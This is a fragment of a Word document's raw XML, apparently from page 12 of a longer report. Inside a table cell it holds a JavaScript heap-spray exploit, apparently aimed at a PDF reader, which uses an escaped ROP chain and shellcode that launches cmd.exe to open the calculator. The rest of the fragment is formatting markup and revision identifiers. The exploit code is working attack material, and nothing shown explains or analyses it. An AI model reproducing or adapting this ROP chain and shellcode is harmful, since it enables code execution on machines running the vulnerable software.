            <w:r>
              <w:t>var y = new Array();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>function alloc(bytes) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>return padding.substr(0, (bytes - 6) / 2);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>function spray_eip(esc_a) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>pointers_a = unescape(esc_a);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>for (i = 0; i &lt; 2000; i++) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>x[i] = alloc(0x8) + pointers_a;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>y[i] = alloc(0x88) + pointers_a;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>y[i] = alloc(0x88) + pointers_a;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>y[i] = alloc(0x88) + pointers_a;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>function spray_shellcode() {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>bbb = unescape('%ud525%ue615%u0c0c%u0c0c%u0c0c%u0c0c%u6f29%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u6f29%u4a80%u6cef%u4a80%u6dbb%u2357%u6dbb%u2357%u6dbb%u2357%u6dbb%u2357%u0000%u0000%u0002%u0000%u0102%u0000%u6f29%u4a80%u4dac%ud7d0%u4dac%ud7d0%u4dac%ud7d0%u4dac%ud7d0%u4dac%ud7d0%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%u63a5%u4a80%u45e9%u2525%u45e9%u2525%u45e9%u2525%u45e9%u2525%u45e9%u2525%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u0000%u0000%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u1beb%u315b%u50c0%uc031%u4388%u5313%uadbb%u8623%uff7c%u31d3%u50c0%ufabb%u81ca%uff7c%ue8d3%uffe0%uffff%u6d63%u2e64%u7865%u2065%u632f%u6320%u6c61%u2e63%u7865%u9065');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>ccc = unescape("%u0c0c");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>ccc += ccc;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>while (ccc.length + 20 + 8 &lt; (0x8000 + 0x8000)) ccc += ccc;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>i1 = 0x0c0c - 0x24;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>ddd = ccc.substring(0, i1 / 2);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>ddd += bbb;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>ddd += ccc;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>i2 = 0x4000 + 0xc000;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>eee = ddd.substring(0, i2 / 2);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>for (; eee.length&lt; 0x40000 + 0x40000;) eee += eee;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>i3 = (0x1020 - 0x08) / 2;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>fff = eee.substring(0, 0x80000 - i3);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>ggg = new Array();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:tab/>
              <w:t>for (hhh = 0; hhh&lt; 0x1e0 + 0x10; hhh++) ggg[hhh] = fff + "s";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>padding = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u53c3%u4a84%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u0c0c%u0c0c%u4141%u4141%u4141%u4141%u0c0c%u0c0c%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u0c0c%u0c0c");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>while (padding.length&lt; 0x10000)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>padding = padding + padding;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>spray_shellcode();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>spray_eip('%u4141');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714"/>
          <w:p w:rsidR="00A00B2A" w:rsidRPr="00F0292C" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>this.pageNum = 2;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A00B2A" w:rsidRPr="00A00B2A" w:rsidRDefault="00A00B2A" w:rsidP="00A00B2A"/>
    <w:sectPr w:rsidR="00A00B2A" w:rsidRPr="00A00B2A" w:rsidSect="0046037F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B16" w:rsidRDefault="00EE6B16" w:rsidP="0065723E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EE6B16" w:rsidRDefault="00EE6B16" w:rsidP="0065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5577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7D3AA4" w:rsidRDefault="007D3AA4">
            <w:pPr>
              <w:pStyle w:val="Footer"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page </w:t>
            </w:r>
            <w:r w:rsidR="000A4F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A4F2C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004840F3">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="000A4F2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A4F2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A4F2C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004840F3">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="000A4F2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D3AA4" w:rsidRDefault="007D3A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B16" w:rsidRDefault="00EE6B16" w:rsidP="0065723E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EE6B16" w:rsidRDefault="00EE6B16" w:rsidP="0065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0B97"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2140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36C5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB9CD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E0C09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91B2BC48"/>
    <w:lvl w:ilvl="0" w:tplc="9C8C1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96389"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56740676"/>
    <w:lvl w:ilvl="0" w:tplc="4C829A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86A21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A15CB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18E328A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07A20B82"/>
    <w:lvl w:ilvl="0" w:tplc="8BF4AE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21FD"/>
    <w:rsid w:val="00000AC4"/>
    <w:rsid w:val="000051F4"/>
    <w:rsid w:val="00015672"/>
    <w:rsid w:val="000157E4"/>
    <w:rsid w:val="00015CCF"/>
    <w:rsid w:val="00016A90"/>
    <w:rsid w:val="0001707A"/>
    <w:rsid w:val="00022FE0"/>
    <w:rsid w:val="000231FA"/>
    <w:rsid w:val="000248A8"/>
    <w:rsid w:val="00024BB6"/>
    <w:rsid w:val="000305F4"/>
    <w:rsid w:val="00033E8C"/>
    <w:rsid w:val="000340C1"/>
    <w:rsid w:val="00035056"/>
    <w:rsid w:val="00036C3E"/>
    <w:rsid w:val="00037F5D"/>
    <w:rsid w:val="00046F72"/>
    <w:rsid w:val="00052B52"/>
    <w:rsid w:val="00057A38"/>
    <w:rsid w:val="00061563"/>
    <w:rsid w:val="000616F5"/>
    <w:rsid w:val="00064175"/>
    <w:rsid w:val="00065CD5"/>
    <w:rsid w:val="000732ED"/>
    <w:rsid w:val="00081BD9"/>
    <w:rsid w:val="000829BC"/>
    <w:rsid w:val="00091960"/>
    <w:rsid w:val="00092EC6"/>
    <w:rsid w:val="000936B8"/>
    <w:rsid w:val="000A2164"/>
    <w:rsid w:val="000A2A35"/>
    <w:rsid w:val="000A34E7"/>
    <w:rsid w:val="000A4C72"/>
    <w:rsid w:val="000A4F2C"/>
    <w:rsid w:val="000B7DAD"/>
    <w:rsid w:val="000D035F"/>
    <w:rsid w:val="000D1624"/>
    <w:rsid w:val="000D63B6"/>
    <w:rsid w:val="000D64DF"/>
    <w:rsid w:val="000E2B6F"/>
    <w:rsid w:val="000E5328"/>
    <w:rsid w:val="000E73BA"/>
    <w:rsid w:val="000F26D5"/>
    <w:rsid w:val="000F34E5"/>
    <w:rsid w:val="000F3983"/>
    <w:rsid w:val="000F6061"/>
    <w:rsid w:val="000F6C52"/>
    <w:rsid w:val="000F76EA"/>
    <w:rsid w:val="00101BCE"/>
    <w:rsid w:val="00101E9E"/>
    <w:rsid w:val="00104527"/>
    <w:rsid w:val="001056F0"/>
    <w:rsid w:val="00111EF6"/>
    <w:rsid w:val="0012092C"/>
    <w:rsid w:val="00135291"/>
    <w:rsid w:val="00135FDF"/>
    <w:rsid w:val="00140B10"/>
    <w:rsid w:val="00142B18"/>
    <w:rsid w:val="00142E3E"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00154EE5"/>
    <w:rsid w:val="00155C20"/>
    <w:rsid w:val="001605C9"/>
    <w:rsid w:val="00161B13"/>
    <w:rsid w:val="0016467F"/>
    <w:rsid w:val="001777FD"/>
    <w:rsid w:val="001822FC"/>
    <w:rsid w:val="00193401"/>
    <w:rsid w:val="001A4437"/>
    <w:rsid w:val="001B0054"/>
    <w:rsid w:val="001B2CA1"/>
    <w:rsid w:val="001B43F2"/>
    <w:rsid w:val="001B6B59"/>
    <w:rsid w:val="001C4F8A"/>
    <w:rsid w:val="001D09A6"/>
    <w:rsid w:val="001D257D"/>
    <w:rsid w:val="001D6439"/>
    <w:rsid w:val="001F458B"/>
    <w:rsid w:val="001F6770"/>
    <w:rsid w:val="00202BF6"/>
    <w:rsid w:val="00205A45"/>
    <w:rsid w:val="002069D3"/>
    <w:rsid w:val="00216DDB"/>
    <w:rsid w:val="00220DB0"/>
    <w:rsid w:val="002214F7"/>
    <w:rsid w:val="00221D9E"/>
    <w:rsid w:val="002233EF"/>
    <w:rsid w:val="00223E53"/>
    <w:rsid w:val="002318A3"/>
    <w:rsid w:val="00241D06"/>
    <w:rsid w:val="00247F90"/>
    <w:rsid w:val="00256657"/>
    <w:rsid w:val="00260683"/>
    <w:rsid w:val="0026204C"/>
    <w:rsid w:val="00262D67"/>
    <w:rsid w:val="00263629"/>
    <w:rsid w:val="00271F6F"/>
    <w:rsid w:val="00273D31"/>
    <w:rsid w:val="0027404E"/>
    <w:rsid w:val="0027443A"/>
    <w:rsid w:val="00277FFC"/>
    <w:rsid w:val="00280654"/>
    <w:rsid w:val="00280C0B"/>
    <w:rsid w:val="002942CF"/>
    <w:rsid w:val="002947C1"/>
    <w:rsid w:val="00295BFF"/>
    <w:rsid w:val="00296A31"/>
    <w:rsid w:val="002B1E01"/>
    <w:rsid w:val="002B4B04"/>
    <w:rsid w:val="002B4D6E"/>
    <w:rsid w:val="002C2BF0"/>
    <w:rsid w:val="002C763D"/>
    <w:rsid w:val="002D2CD7"/>
    <w:rsid w:val="002E01EB"/>
    <w:rsid w:val="002E0BBF"/>
    <w:rsid w:val="002E3B5E"/>
    <w:rsid w:val="002E7578"/>
    <w:rsid w:val="002E763C"/>
    <w:rsid w:val="002E7DD3"/>
    <w:rsid w:val="002F01B3"/>
    <w:rsid w:val="002F48AA"/>
    <w:rsid w:val="002F4E18"/>
    <w:rsid w:val="002F630B"/>
    <w:rsid w:val="002F7042"/>
    <w:rsid w:val="003041CB"/>
    <w:rsid w:val="00305446"/>
    <w:rsid w:val="00312BAE"/>
    <w:rsid w:val="00312EC9"/>
    <w:rsid w:val="00314537"/>
    <w:rsid w:val="00315ED5"/>
    <w:rsid w:val="0033038D"/>
    <w:rsid w:val="00335466"/>
    <w:rsid w:val="003357CC"/>
    <w:rsid w:val="003416C6"/>
    <w:rsid w:val="00341CBE"/>
    <w:rsid w:val="00344BBD"/>
    <w:rsid w:val="0034674C"/>
    <w:rsid w:val="00350CB4"/>
    <w:rsid w:val="003534E1"/>
    <w:rsid w:val="00353EB7"/>
    <w:rsid w:val="00360360"/>
    <w:rsid w:val="003606CE"/>
    <w:rsid w:val="0036640F"/>
    <w:rsid w:val="00376F03"/>
    <w:rsid w:val="003800E0"/>
    <w:rsid w:val="0038024A"/>
    <w:rsid w:val="00382589"/>
    <w:rsid w:val="003868DF"/>
    <w:rsid w:val="00387BE6"/>
    <w:rsid w:val="00390E3E"/>
    <w:rsid w:val="0039146A"/>
    <w:rsid w:val="00394078"/>
    <w:rsid w:val="00397D19"/>
    <w:rsid w:val="003A196E"/>
    <w:rsid w:val="003A3BA5"/>
    <w:rsid w:val="003A478A"/>
    <w:rsid w:val="003B1C64"/>
    <w:rsid w:val="003B76A5"/>
    <w:rsid w:val="003C3BDB"/>
    <w:rsid w:val="003C7044"/>
    <w:rsid w:val="003D22EE"/>
    <w:rsid w:val="003D2F2E"/>
    <w:rsid w:val="003E0DB4"/>
    <w:rsid w:val="003E5AE6"/>
    <w:rsid w:val="003E6B7D"/>
    <w:rsid w:val="003F164B"/>
    <w:rsid w:val="00401183"/>
    <w:rsid w:val="004037B9"/>
    <w:rsid w:val="0040544F"/>
    <w:rsid w:val="00407531"/>
    <w:rsid w:val="004104E2"/>
    <w:rsid w:val="0041066E"/>
    <w:rsid w:val="0041427B"/>
    <w:rsid w:val="00414671"/>
    <w:rsid w:val="0041493D"/>
    <w:rsid w:val="00422EE0"/>
    <w:rsid w:val="00425912"/>
    <w:rsid w:val="00434ABD"/>
    <w:rsid w:val="00435313"/>
    <w:rsid w:val="00436DF8"/>
    <w:rsid w:val="00441F54"/>
    <w:rsid w:val="004452B3"/>
    <w:rsid w:val="00450FF2"/>
    <w:rsid w:val="004518EB"/>
    <w:rsid w:val="004535EB"/>
    <w:rsid w:val="00453BAD"/>
    <w:rsid w:val="0046037F"/>
    <w:rsid w:val="004625A3"/>
    <w:rsid w:val="004626C5"/>
    <w:rsid w:val="00470897"/>
    <w:rsid w:val="00477827"/>
    <w:rsid w:val="004840F3"/>
    <w:rsid w:val="00484E2A"/>
    <w:rsid w:val="00484EE1"/>
    <w:rsid w:val="004873B0"/>
    <w:rsid w:val="00487F74"/>
    <w:rsid w:val="00493FFE"/>
    <w:rsid w:val="0049642E"/>
    <w:rsid w:val="004A5D85"/>
    <w:rsid w:val="004A6CCC"/>
    <w:rsid w:val="004A7667"/>
    <w:rsid w:val="004B6163"/>
    <w:rsid w:val="004C0609"/>
    <w:rsid w:val="004C0CB9"/>
    <w:rsid w:val="004C1E04"/>
    <w:rsid w:val="004C4CAE"/>
    <w:rsid w:val="004D2921"/>
    <w:rsid w:val="004D370A"/>
    <w:rsid w:val="004D3DD5"/>
    <w:rsid w:val="004D5DDB"/>
    <w:rsid w:val="004E2167"/>
    <w:rsid w:val="004E68DB"/>
    <w:rsid w:val="004F17DB"/>
    <w:rsid w:val="004F308B"/>
    <w:rsid w:val="004F5EA6"/>
    <w:rsid w:val="0050319E"/>
    <w:rsid w:val="005137A9"/>
    <w:rsid w:val="0052114A"/>
    <w:rsid w:val="00523CBC"/>
    <w:rsid w:val="00541AD3"/>
    <w:rsid w:val="0054480D"/>
    <w:rsid w:val="00546BF7"/>
    <w:rsid w:val="00561F11"/>
    <w:rsid w:val="00562D37"/>
    <w:rsid w:val="00564D03"/>
    <w:rsid w:val="005737F7"/>
    <w:rsid w:val="00577113"/>
    <w:rsid w:val="00580260"/>
    <w:rsid w:val="00584FD3"/>
    <w:rsid w:val="00585898"/>
    <w:rsid w:val="005877CA"/>
    <w:rsid w:val="00592E73"/>
    <w:rsid w:val="00595E19"/>
    <w:rsid w:val="005A062F"/>
    <w:rsid w:val="005A4CD0"/>
    <w:rsid w:val="005A622A"/>
    <w:rsid w:val="005A6864"/>
    <w:rsid w:val="005B1B2F"/>
    <w:rsid w:val="005B23EC"/>
    <w:rsid w:val="005B3E2E"/>
    <w:rsid w:val="005C0453"/>
    <w:rsid w:val="005C3DF1"/>
    <w:rsid w:val="005C4257"/>
    <w:rsid w:val="005C6880"/>
    <w:rsid w:val="005D0BCB"/>
    <w:rsid w:val="005D2D3E"/>
    <w:rsid w:val="005E5E3F"/>
    <w:rsid w:val="005E77BD"/>
    <w:rsid w:val="005F3574"/>
    <w:rsid w:val="005F4918"/>
    <w:rsid w:val="005F526F"/>
    <w:rsid w:val="005F66A3"/>
    <w:rsid w:val="005F7E98"/>
    <w:rsid w:val="0060121B"/>
    <w:rsid w:val="00617E83"/>
    <w:rsid w:val="00622E48"/>
    <w:rsid w:val="00637602"/>
    <w:rsid w:val="006409EF"/>
    <w:rsid w:val="00641BE8"/>
    <w:rsid w:val="00642DAE"/>
    <w:rsid w:val="006431C9"/>
    <w:rsid w:val="00651C1B"/>
    <w:rsid w:val="006539F1"/>
    <w:rsid w:val="00656015"/>
    <w:rsid w:val="0065723E"/>
    <w:rsid w:val="00661594"/>
    <w:rsid w:val="00663B8F"/>
    <w:rsid w:val="006672A2"/>
    <w:rsid w:val="00667C3E"/>
    <w:rsid w:val="00672BE4"/>
    <w:rsid w:val="00674846"/>
    <w:rsid w:val="00675423"/>
    <w:rsid w:val="00681DFE"/>
    <w:rsid w:val="006A3E0C"/>
    <w:rsid w:val="006A52E0"/>
    <w:rsid w:val="006A5D66"/>
    <w:rsid w:val="006A6E79"/>
    <w:rsid w:val="006A7BD5"/>
    <w:rsid w:val="006B0209"/>
    <w:rsid w:val="006B09AC"/>
    <w:rsid w:val="006B229B"/>
    <w:rsid w:val="006B4C92"/>
    <w:rsid w:val="006C0270"/>
    <w:rsid w:val="006C382E"/>
    <w:rsid w:val="006C3A64"/>
    <w:rsid w:val="006C49B7"/>
    <w:rsid w:val="006C7813"/>
    <w:rsid w:val="006D52E8"/>
    <w:rsid w:val="006E553B"/>
    <w:rsid w:val="006F5C64"/>
    <w:rsid w:val="0070676D"/>
    <w:rsid w:val="00707607"/>
    <w:rsid w:val="00712AA7"/>
    <w:rsid w:val="00713146"/>
    <w:rsid w:val="00713C7C"/>
    <w:rsid w:val="00714AFF"/>
    <w:rsid w:val="007217CF"/>
    <w:rsid w:val="00721F8E"/>
    <w:rsid w:val="00722E99"/>
    <w:rsid w:val="00724B02"/>
    <w:rsid w:val="007271C0"/>
    <w:rsid w:val="00731791"/>
    <w:rsid w:val="00732061"/>
    <w:rsid w:val="00733FDC"/>
    <w:rsid w:val="00741306"/>
    <w:rsid w:val="00743C78"/>
    <w:rsid w:val="00744F78"/>
    <w:rsid w:val="0074651C"/>
    <w:rsid w:val="00754C9B"/>
    <w:rsid w:val="00767CF5"/>
    <w:rsid w:val="0077138F"/>
    <w:rsid w:val="007737D2"/>
    <w:rsid w:val="007903E4"/>
    <w:rsid w:val="00790A49"/>
    <w:rsid w:val="00790F29"/>
    <w:rsid w:val="00792F58"/>
    <w:rsid w:val="00797687"/>
    <w:rsid w:val="0079790D"/>
    <w:rsid w:val="007A02E9"/>
    <w:rsid w:val="007A33F9"/>
    <w:rsid w:val="007B0872"/>
    <w:rsid w:val="007B1EC6"/>
    <w:rsid w:val="007B3805"/>
    <w:rsid w:val="007B55D4"/>
    <w:rsid w:val="007C00A1"/>
    <w:rsid w:val="007C05E9"/>
    <w:rsid w:val="007C0EB4"/>
    <w:rsid w:val="007C2A48"/>
    <w:rsid w:val="007D378D"/>
    <w:rsid w:val="007D391B"/>
    <w:rsid w:val="007D3AA4"/>
    <w:rsid w:val="007D5B72"/>
    <w:rsid w:val="007D77CF"/>
    <w:rsid w:val="007D7B6B"/>
    <w:rsid w:val="007E0773"/>
    <w:rsid w:val="007E15F7"/>
    <w:rsid w:val="007E78DE"/>
    <w:rsid w:val="007F3007"/>
    <w:rsid w:val="007F3924"/>
    <w:rsid w:val="007F3CE5"/>
    <w:rsid w:val="007F446D"/>
    <w:rsid w:val="007F7738"/>
    <w:rsid w:val="008018C2"/>
    <w:rsid w:val="008022A5"/>
    <w:rsid w:val="008115CE"/>
    <w:rsid w:val="008123FC"/>
    <w:rsid w:val="008161DE"/>
    <w:rsid w:val="0082040A"/>
    <w:rsid w:val="00821081"/>
    <w:rsid w:val="00824BCC"/>
    <w:rsid w:val="00832B63"/>
    <w:rsid w:val="00835173"/>
    <w:rsid w:val="00840694"/>
    <w:rsid w:val="0084308D"/>
    <w:rsid w:val="00844D75"/>
    <w:rsid w:val="00846C08"/>
    <w:rsid w:val="00861C85"/>
    <w:rsid w:val="008664D0"/>
    <w:rsid w:val="00866936"/>
    <w:rsid w:val="00866F31"/>
    <w:rsid w:val="00867E16"/>
    <w:rsid w:val="00870714"/>
    <w:rsid w:val="00872907"/>
    <w:rsid w:val="008741DE"/>
    <w:rsid w:val="00874229"/>
    <w:rsid w:val="008761AF"/>
    <w:rsid w:val="00880677"/>
    <w:rsid w:val="008915AE"/>
    <w:rsid w:val="00893F59"/>
    <w:rsid w:val="008B1A93"/>
    <w:rsid w:val="008B1EAC"/>
    <w:rsid w:val="008B2F88"/>
    <w:rsid w:val="008B3FD0"/>
    <w:rsid w:val="008B64A7"/>
    <w:rsid w:val="008B6FF1"/>
    <w:rsid w:val="008C266B"/>
    <w:rsid w:val="008C3A63"/>
    <w:rsid w:val="008C68C8"/>
    <w:rsid w:val="008C6BF7"/>
    <w:rsid w:val="008D0895"/>
    <w:rsid w:val="008D5A1D"/>
    <w:rsid w:val="008E2B5C"/>
    <w:rsid w:val="008E3C39"/>
    <w:rsid w:val="009018CA"/>
    <w:rsid w:val="00901D52"/>
    <w:rsid w:val="00906633"/>
    <w:rsid w:val="009139E3"/>
    <w:rsid w:val="00917CFA"/>
    <w:rsid w:val="0092048C"/>
    <w:rsid w:val="0092184F"/>
    <w:rsid w:val="00925C54"/>
    <w:rsid w:val="009262A2"/>
    <w:rsid w:val="00933564"/>
    <w:rsid w:val="00934DE9"/>
    <w:rsid w:val="00936F51"/>
    <w:rsid w:val="00942AD0"/>
    <w:rsid w:val="00943DF9"/>
    <w:rsid w:val="00944137"/>
    <w:rsid w:val="009465B7"/>
    <w:rsid w:val="009510C9"/>
    <w:rsid w:val="00954238"/>
    <w:rsid w:val="00956251"/>
    <w:rsid w:val="009632B0"/>
    <w:rsid w:val="00967576"/>
    <w:rsid w:val="009716B1"/>
    <w:rsid w:val="00973DD2"/>
    <w:rsid w:val="0098196B"/>
    <w:rsid w:val="00983E18"/>
    <w:rsid w:val="00985FF8"/>
    <w:rsid w:val="00987465"/>
    <w:rsid w:val="00992FD4"/>
    <w:rsid w:val="009936A0"/>
